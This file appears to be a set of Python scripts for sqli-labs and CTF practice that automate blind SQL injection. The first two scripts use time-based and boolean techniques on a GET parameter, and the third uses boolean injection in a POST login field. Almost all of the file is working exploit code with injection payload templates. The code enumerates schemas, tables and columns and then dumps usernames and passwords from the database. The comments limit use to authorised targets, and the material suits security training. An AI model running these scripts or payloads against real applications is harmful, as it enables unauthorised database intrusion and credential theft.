时间盲注 — time-based blind SQL injection (sqli-labs Less-8, GET parameter `id`; the oracle is the response delay caused by `sleep()`)
# -*- coding: utf-8 -*-
"""
Created on Fri Jul 1 22:58:49 2022
@author: small_star
"""
import requests
import time
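def get_tables(base_url=None, max_rows=5, max_len=8, delay=2, timeout=None, session=None):
    """Recover table names of the current database by time-based blind SQLi.

    One request per candidate character: the injected condition is ANDed with
    ``sleep(delay)``, so MySQL only sleeps when the character guess is true
    (``false AND sleep()`` short-circuits). A response that took at least
    ``delay`` seconds therefore means a hit; the page content is never read.

    Args:
        base_url: injectable URL ending in the vulnerable parameter value,
            e.g. ``.../?id=1'``. Defaults to the module-level ``url``.
        max_rows: number of result rows (table names) to extract.
        max_len: longest name that can be recovered; longer names are
            silently truncated.
        delay: seconds the target is told to sleep on a true condition.
        timeout: per-request timeout in seconds. Defaults to ``delay * 5`` so
            a dead target raises instead of blocking forever; keep it well
            above ``delay`` or true guesses will be reported as timeouts.
        session: object exposing ``get(url, timeout=...)``; defaults to the
            ``requests`` module. Pass a ``requests.Session`` for keep-alive,
            or a stub to exercise the extraction logic offline.

    Returns:
        The first recovered table name, or ``None`` when none was found
        (kept for compatibility with the original callers; the full list is
        printed before returning).

    Raises:
        Whatever the transport raises on network errors or timeouts
        (``requests.exceptions.RequestException`` with ``requests``).
    """
    target = url if base_url is None else base_url
    http = requests if session is None else session
    if timeout is None:
        timeout = delay * 5
    query = 'select table_name from information_schema.tables where table_schema=database()'
    tables = []
    for row in range(max_rows):
        name = ''
        for pos in range(1, max_len + 1):
            for code in range(33, 127):
                # %23 is '#': it comments out the remainder of the original query.
                payload = (target
                           + " and ascii(substr(({0} limit {1},1),{2},1)) = {3} and sleep({4}) %23"
                           .format(query, row, pos, code, delay))
                resp = http.get(payload, timeout=timeout)
                # elapsed is measured until the headers arrive, so it is not
                # skewed by body download or client-side overhead.
                if resp.elapsed.total_seconds() >= delay:
                    name += chr(code)
                    print(name)
                    break  # found this position; skip the remaining codes
            else:
                # No printable ASCII code matched: substr() past the end of the
                # name yields '' (ascii 0), so the name is complete. A character
                # outside 33..126 would also stop extraction here.
                break
        if not name:
            break  # empty row: no more tables
        tables.append(name)
    print(tables)
    return tables[0] if tables else None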
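def get_column(table='users', base_url=None, max_rows=5, max_len=8, delay=2, timeout=None, session=None):
    """Recover column names of ``table`` by time-based blind SQLi.

    Same oracle as ``get_tables``: each character guess is ANDed with
    ``sleep(delay)`` and a response slower than ``delay`` seconds is a hit.

    Args:
        table: table whose columns are listed (the original hard-coded
            ``users``). It is spliced into a double-quoted SQL literal, which
            is a string in default MySQL mode; under ``ANSI_QUOTES`` it would
            be read as an identifier instead.
        base_url: injectable URL ending in the vulnerable parameter value.
            Defaults to the module-level ``url``.
        max_rows: number of column names to extract.
        max_len: longest name that can be recovered; longer names are truncated.
        delay: seconds the target is told to sleep on a true condition.
        timeout: per-request timeout; defaults to ``delay * 5``.
        session: object exposing ``get(url, timeout=...)``; defaults to the
            ``requests`` module.

    Returns:
        The first recovered column name, or ``None`` when none was found
        (kept for compatibility with the original callers; the full list is
        printed before returning).
    """
    target = url if base_url is None else base_url
    http = requests if session is None else session
    if timeout is None:
        timeout = delay * 5
    query = ('select column_name from information_schema.columns '
             'where table_schema=database() and table_name="{0}" '.format(table))
    columns = []
    for row in range(max_rows):
        name = ''
        for pos in range(1, max_len + 1):
            for code in range(33, 127):
                payload = (target
                           + " and ascii(substr(({0} limit {1},1),{2},1))={3} and sleep({4}) %23"
                           .format(query, row, pos, code, delay))
                resp = http.get(payload, timeout=timeout)
                if resp.elapsed.total_seconds() >= delay:
                    name += chr(code)
                    print(name)
                    break  # found this position; skip the remaining codes
            else:
                break  # nothing matched: end of this name
        if not name:
            break  # empty row: no more columns
        columns.append(name)
    print(columns)
    return columns[0] if columns else None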
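def get_data(query="select username from users", base_url=None, max_rows=5, max_len=14,
             delay=2, timeout=None, session=None):
    """Dump the rows returned by ``query`` by time-based blind SQLi.

    The original switched between queries by editing commented-out lines
    (``select password from users``, ``... where username='flag'``); pass
    the query instead. Each character guess is ANDed with ``sleep(delay)``
    and a response slower than ``delay`` seconds is a hit.

    Args:
        query: single-column SELECT whose rows are extracted one by one.
        base_url: injectable URL ending in the vulnerable parameter value.
            Defaults to the module-level ``url``.
        max_rows: number of rows to extract.
        max_len: longest value that can be recovered; longer values are truncated.
        delay: seconds the target is told to sleep on a true condition.
        timeout: per-request timeout; defaults to ``delay * 5``.
        session: object exposing ``get(url, timeout=...)``; defaults to the
            ``requests`` module.

    Returns:
        The recovered values, in row order (also printed). The original
        returned ``None``, so callers that ignore the result are unaffected.
    """
    target = url if base_url is None else base_url
    http = requests if session is None else session
    if timeout is None:
        timeout = delay * 5
    rows = []
    for row in range(max_rows):
        value = ''
        for pos in range(1, max_len + 1):
            for code in range(33, 127):
                payload = (target
                           + " and ascii(substr(({0} limit {1},1),{2},1))={3} and sleep({4}) %23"
                           .format(query, row, pos, code, delay))
                resp = http.get(payload, timeout=timeout)
                if resp.elapsed.total_seconds() >= delay:
                    value += chr(code)
                    print(value)
                    break  # found this position; skip the remaining codes
            else:
                break  # nothing matched: end of this value
        if not value:
            break  # empty row: no more data
        rows.append(value)
    print(rows)
    return rows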
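if __name__ == '__main__':
    import sys

    # Target under test (sqli-labs Less-8). Only run this against systems you
    # are authorised to test. An optional first argument overrides the URL;
    # it must end in the injectable value, e.g. .../?id=1'
    url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8082/sqli/sqlilabs/less-8/?id=1'"
    # Typical order: get_tables() -> get_column() -> get_data(); only the
    # final dump is enabled here.
    get_data()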
布尔盲注 — boolean-based blind SQL injection (sqli-labs Less-8, GET parameter `id`; the oracle is a marker string in the response body)
import requests
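def get_tables(base_url=None, max_rows=5, max_len=8, marker='You are in', timeout=10, session=None):
    """Recover table names of the current database by boolean-based blind SQLi.

    One request per candidate character; the guess is correct when the
    response body contains ``marker``, the text the target renders for a
    true condition (adjust it per target, as the original comment advised).

    Args:
        base_url: injectable URL ending in the vulnerable parameter value,
            e.g. ``.../?id=1'``. Defaults to the module-level ``url``.
        max_rows: number of result rows (table names) to extract.
        max_len: longest name that can be recovered; longer names are
            silently truncated.
        marker: substring of the page that appears only for true conditions.
        timeout: per-request timeout in seconds, so a dead target raises
            instead of blocking the scan forever.
        session: object exposing ``get(url, timeout=...)``; defaults to the
            ``requests`` module. Pass a ``requests.Session`` for keep-alive,
            or a stub to exercise the extraction logic offline.

    Returns:
        The first recovered table name, or ``None`` when none was found
        (kept for compatibility with the original callers; the full list is
        printed before returning).
    """
    target = url if base_url is None else base_url
    http = requests if session is None else session
    query = 'select table_name from information_schema.tables where table_schema=database()'
    tables = []
    for row in range(max_rows):
        name = ''
        for pos in range(1, max_len + 1):
            for code in range(33, 127):
                # %23 is '#': it comments out the remainder of the original query.
                payload = (target
                           + " and ascii(substr(({0} limit {1},1),{2},1))={3}%23"
                           .format(query, row, pos, code))
                resp = http.get(payload, timeout=timeout)
                if marker in resp.text:
                    name += chr(code)
                    print(name)
                    break  # found this position; skip the remaining codes
            else:
                # No printable ASCII code matched: substr() past the end of the
                # name yields '' (ascii 0), so the name is complete.
                break
        if not name:
            break  # empty row: no more tables
        tables.append(name)
    print(tables)
    return tables[0] if tables else None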
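def get_column(table='users', base_url=None, max_rows=5, max_len=8, marker='You are in', timeout=10, session=None):
    """Recover column names of ``table`` by boolean-based blind SQLi.

    Same oracle as ``get_tables``: a guess is true when ``marker`` appears
    in the response body.

    Args:
        table: table whose columns are listed (the original hard-coded
            ``users``; its comment said to change it per target). It is
            spliced into a double-quoted SQL literal, which is a string in
            default MySQL mode but an identifier under ``ANSI_QUOTES``.
        base_url: injectable URL ending in the vulnerable parameter value.
            Defaults to the module-level ``url``.
        max_rows: number of column names to extract.
        max_len: longest name that can be recovered; longer names are truncated.
        marker: substring of the page that appears only for true conditions.
        timeout: per-request timeout in seconds.
        session: object exposing ``get(url, timeout=...)``; defaults to the
            ``requests`` module.

    Returns:
        The first recovered column name, or ``None`` when none was found
        (kept for compatibility with the original callers; the full list is
        printed before returning).
    """
    target = url if base_url is None else base_url
    http = requests if session is None else session
    query = ('select column_name from information_schema.columns '
             'where table_schema=database() and table_name="{0}" '.format(table))
    columns = []
    for row in range(max_rows):
        name = ''
        for pos in range(1, max_len + 1):
            for code in range(33, 127):
                payload = (target
                           + " and ascii(substr(({0} limit {1},1),{2},1))={3}%23"
                           .format(query, row, pos, code))
                resp = http.get(payload, timeout=timeout)
                if marker in resp.text:
                    name += chr(code)
                    print(name)
                    break  # found this position; skip the remaining codes
            else:
                break  # nothing matched: end of this name
        if not name:
            break  # empty row: no more columns
        columns.append(name)
    print(columns)
    return columns[0] if columns else None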
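def get_data(query="select password from users where username='flag' ", base_url=None,
             max_rows=20, max_len=14, marker='You are in', timeout=10, session=None):
    """Dump the rows returned by ``query`` by boolean-based blind SQLi.

    The original switched between queries by editing commented-out lines;
    pass the query instead. A character guess is true when ``marker``
    appears in the response body.

    Args:
        query: single-column SELECT whose rows are extracted one by one.
        base_url: injectable URL ending in the vulnerable parameter value.
            Defaults to the module-level ``url``.
        max_rows: number of rows to extract.
        max_len: longest value that can be recovered; longer values are truncated.
        marker: substring of the page that appears only for true conditions.
        timeout: per-request timeout in seconds.
        session: object exposing ``get(url, timeout=...)``; defaults to the
            ``requests`` module.

    Returns:
        The recovered values, in row order (also printed). The original
        returned ``None``, so callers that ignore the result are unaffected.
    """
    target = url if base_url is None else base_url
    http = requests if session is None else session
    rows = []
    for row in range(max_rows):
        value = ''
        for pos in range(1, max_len + 1):
            for code in range(33, 127):
                payload = (target
                           + " and ascii(substr(({0} limit {1},1),{2},1))={3}%23"
                           .format(query, row, pos, code))
                resp = http.get(payload, timeout=timeout)
                if marker in resp.text:
                    value += chr(code)
                    print(value)
                    break  # found this position; skip the remaining codes
            else:
                break  # nothing matched: end of this value
        if not value:
            break  # empty row: no more data
        rows.append(value)
    print(rows)
    return rows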
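if __name__ == '__main__':
    import sys

    # Target under test (sqli-labs Less-8). Only run this against systems you
    # are authorised to test. An optional first argument overrides the URL;
    # it must end in the injectable value, e.g. .../?id=1'
    url = sys.argv[1] if len(sys.argv) > 1 else "http://localhost:8082/sqli/sqlilabs/less-8/?id=1'"
    # Full pipeline: schema discovery first, then the data dump. Each step
    # prints what it recovers, so the return values are not needed here.
    get_tables()
    get_column()
    get_data()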
POST传参 — boolean-based blind SQL injection through POST form fields (sqli-labs Less-15, `uname` field; the oracle is a marker string in the response body)
import requests
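def get_schema(base_url=None, max_rows=5, max_len=8, marker='flag.jpg', timeout=10, session=None):
    """Recover database (schema) names by boolean-based blind SQLi over POST.

    The guess goes into the ``uname`` form field as ``1' or <condition>#``.
    Because the injection uses OR, the response reflects the condition only
    if no row matches ``uname='1'`` on its own -- assumed here, verify on the
    target. A guess is true when ``marker`` appears in the response body.

    Args:
        base_url: login form URL that is POSTed to. Defaults to the
            module-level ``url``.
        max_rows: number of schema names to extract.
        max_len: longest name that can be recovered; longer names (e.g.
            ``information_schema``) are silently truncated.
        marker: substring of the page that appears only for true conditions
            (adjust per target, as the original comment advised).
        timeout: per-request timeout in seconds, so a dead target raises
            instead of blocking the scan forever.
        session: object exposing ``post(url, data=..., timeout=...)``;
            defaults to the ``requests`` module.

    Returns:
        The first recovered schema name, or ``None`` when none was found
        (kept for compatibility with the original callers; the full list is
        printed before returning).
    """
    target = url if base_url is None else base_url
    http = requests if session is None else session
    query = 'select schema_name from information_schema.schemata'
    schemas = []
    for row in range(max_rows):
        name = ''
        for pos in range(1, max_len + 1):
            for code in range(33, 127):
                # Form data is not URL-parsed by the client, so a literal '#'
                # (rather than %23) comments out the rest of the query.
                form = {
                    "uname": "1' or ascii(substr(({0} limit {1},1),{2},1))={3}#".format(query, row, pos, code),
                    "passwd": "",
                    "submit": "Submit",
                }
                resp = http.post(target, data=form, timeout=timeout)
                if marker in resp.text:
                    name += chr(code)
                    print(name)
                    break  # found this position; skip the remaining codes
            else:
                break  # nothing matched: end of this name
        if not name:
            break  # empty row: no more schemas
        schemas.append(name)
    print(schemas)
    return schemas[0] if schemas else None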
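def get_tables(base_url=None, max_rows=5, max_len=8, marker='flag.jpg', timeout=10, session=None):
    """Recover table names of the current database by blind SQLi over POST.

    The guess goes into the ``uname`` form field as ``1' or <condition>#``;
    the OR form assumes no row matches ``uname='1'`` by itself. A guess is
    true when ``marker`` appears in the response body.

    Args:
        base_url: login form URL that is POSTed to. Defaults to the
            module-level ``url``.
        max_rows: number of table names to extract.
        max_len: longest name that can be recovered; longer names are truncated.
        marker: substring of the page that appears only for true conditions.
        timeout: per-request timeout in seconds.
        session: object exposing ``post(url, data=..., timeout=...)``;
            defaults to the ``requests`` module.

    Returns:
        The first recovered table name, or ``None`` when none was found
        (kept for compatibility with the original callers; the full list is
        printed before returning).
    """
    target = url if base_url is None else base_url
    http = requests if session is None else session
    query = 'select table_name from information_schema.tables where table_schema=database()'
    tables = []
    for row in range(max_rows):
        name = ''
        for pos in range(1, max_len + 1):
            for code in range(33, 127):
                form = {
                    "uname": "1' or ascii(substr(({0} limit {1},1),{2},1))={3}#".format(query, row, pos, code),
                    "passwd": "",
                    "submit": "Submit",
                }
                resp = http.post(target, data=form, timeout=timeout)
                if marker in resp.text:
                    name += chr(code)
                    print(name)
                    break  # found this position; skip the remaining codes
            else:
                break  # nothing matched: end of this name
        if not name:
            break  # empty row: no more tables
        tables.append(name)
    print(tables)
    return tables[0] if tables else None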
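def get_column(table='users', base_url=None, max_rows=5, max_len=8, marker='flag.jpg', timeout=10, session=None):
    """Recover column names of ``table`` by blind SQLi over POST.

    Same oracle as ``get_tables``: the condition rides in the ``uname`` field
    and a guess is true when ``marker`` appears in the response body.

    Args:
        table: table whose columns are listed (the original hard-coded
            ``users``; its comment said to change it per target). It is
            spliced into a double-quoted SQL literal, which is a string in
            default MySQL mode but an identifier under ``ANSI_QUOTES``.
        base_url: login form URL that is POSTed to. Defaults to the
            module-level ``url``.
        max_rows: number of column names to extract.
        max_len: longest name that can be recovered; longer names are truncated.
        marker: substring of the page that appears only for true conditions.
        timeout: per-request timeout in seconds.
        session: object exposing ``post(url, data=..., timeout=...)``;
            defaults to the ``requests`` module.

    Returns:
        The first recovered column name, or ``None`` when none was found
        (kept for compatibility with the original callers; the full list is
        printed before returning).
    """
    target = url if base_url is None else base_url
    http = requests if session is None else session
    query = ('select column_name from information_schema.columns '
             'where table_schema=database() and table_name="{0}" '.format(table))
    columns = []
    for row in range(max_rows):
        name = ''
        for pos in range(1, max_len + 1):
            for code in range(33, 127):
                form = {
                    "uname": "1' or ascii(substr(({0} limit {1},1),{2},1))={3}#".format(query, row, pos, code),
                    "passwd": "",
                    "submit": "Submit",
                }
                resp = http.post(target, data=form, timeout=timeout)
                if marker in resp.text:
                    name += chr(code)
                    print(name)
                    break  # found this position; skip the remaining codes
            else:
                break  # nothing matched: end of this name
        if not name:
            break  # empty row: no more columns
        columns.append(name)
    print(columns)
    return columns[0] if columns else None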
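def get_data(query="select password from users ", base_url=None, max_rows=20, max_len=14,
             marker='flag.jpg', timeout=10, session=None):
    """Dump the rows returned by ``query`` by blind SQLi over POST.

    The original switched between queries by editing commented-out lines
    (``select username from users``, ``... where username='...'``); pass the
    query instead. A character guess is true when ``marker`` appears in the
    response body.

    Args:
        query: single-column SELECT whose rows are extracted one by one.
        base_url: login form URL that is POSTed to. Defaults to the
            module-level ``url``.
        max_rows: number of rows to extract.
        max_len: longest value that can be recovered; longer values are truncated.
        marker: substring of the page that appears only for true conditions.
        timeout: per-request timeout in seconds.
        session: object exposing ``post(url, data=..., timeout=...)``;
            defaults to the ``requests`` module.

    Returns:
        The recovered values, in row order (also printed). The original
        returned ``None``, so callers that ignore the result are unaffected.
    """
    target = url if base_url is None else base_url
    http = requests if session is None else session
    rows = []
    for row in range(max_rows):
        value = ''
        for pos in range(1, max_len + 1):
            for code in range(33, 127):
                form = {
                    "uname": "1' or ascii(substr(({0} limit {1},1),{2},1))={3}#".format(query, row, pos, code),
                    "passwd": "",
                    "submit": "Submit",
                }
                resp = http.post(target, data=form, timeout=timeout)
                if marker in resp.text:
                    value += chr(code)
                    print(value)
                    break  # found this position; skip the remaining codes
            else:
                break  # nothing matched: end of this value
        if not value:
            break  # empty row: no more data
        rows.append(value)
    print(rows)
    return rows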
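def get(base_url=None, marker='flag.jpg', timeout=10, session=None):
    """Probe the login form with a tautology before running the extractors.

    Sends ``uname=1' or 1=1#`` and prints the whole response so the marker
    for true conditions can be picked by eye. Replaces the original's bare
    ``print(1213213)`` debug output with a real message and a return value.

    Args:
        base_url: login form URL that is POSTed to. Defaults to the
            module-level ``url``.
        marker: substring expected in the response when the injected
            condition is true.
        timeout: per-request timeout in seconds.
        session: object exposing ``post(url, data=..., timeout=...)``;
            defaults to the ``requests`` module.

    Returns:
        True if ``marker`` was found in the response, else False.
    """
    target = url if base_url is None else base_url
    http = requests if session is None else session
    form = {"uname": "1' or 1=1#", "passwd": "", "submit": "Submit"}
    resp = http.post(target, data=form, timeout=timeout)
    print(resp.text)
    found = marker in resp.text
    if found:
        print("tautology accepted: marker found, the uname field is injectable")
    return found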
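if __name__ == '__main__':
    import sys

    # Target under test (sqli-labs Less-15 login form on a CTF host). Only run
    # this against systems you are authorised to test. An optional first
    # argument overrides the URL.
    url = sys.argv[1] if len(sys.argv) > 1 else "http://fd5205d2.lxctf.net/Less-15/"
    # Typical order: get() to confirm the injection point and pick the marker,
    # then get_schema() -> get_tables() -> get_column() -> get_data(). Only the
    # final dump is enabled here.
    get_data()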